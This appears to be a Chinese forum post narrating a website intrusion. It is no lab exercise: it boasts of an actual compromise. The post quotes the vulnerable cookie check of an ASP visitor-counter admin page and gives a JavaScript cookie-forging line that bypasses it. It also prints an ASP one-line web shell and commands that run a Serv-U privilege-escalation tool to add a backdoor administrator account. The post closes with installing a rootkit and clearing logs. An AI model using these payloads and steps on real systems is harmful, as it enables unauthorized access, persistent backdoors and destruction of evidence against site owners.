DB_OWNER权限，SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了)，开了3389（冲着它来的） 后台没什么功能，想放弃，可发现了下面的一幕 发现了一个计数器程序的readme http://www.abc.com/count/readme.txt 有说明就好办，从网上下了个源程序来 发现漏洞文件count/admin.asp代码如下 _____________________________________________________________ <% '****************************** ' ' 飞越访客单用户统计系统 ' 飞越 feiyueziwo@sohu.com ' www.pwsite.net ' ' 版权所有: 动力在线 ' '****************************** %> <% response.write Request.Cookies(feiyue)("Username") if Request.Cookies(feiyue)("Username")="" then response.end response.Redirect("login.asp?action=error") end if%> ........... _____________________________________________________________ cookies欺骗一句话就可以搞定 再IE里输入以下代码，再访问http://www.abc.com/count/admin.asp就是管理员了 javascript:document.cookie="feiyue=Username=cooldiyer"; 后台没什么可利用，郁闷，数据库插马本机测试可以成功，可它网站的不行，压缩了数据库还不行， 后台不能上传文件，只一个备份数据库功能，利用这个功能把数据库连接文件给显示了出来，得到 SQL Server连接用户和密码，远程连接后备份数据库log得到一个shell 主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe 写了一句话木马如下: <%=Server.CreateObject("wscript.shell").exec(request("cmd")).stdout.readall%> 执行： http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net user cooldiyer /add" http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net localgroup administrators cooldiyer /add" 成功！连其3389端口，安上rootkit，CA一个管理员，CleanLog，闪人.......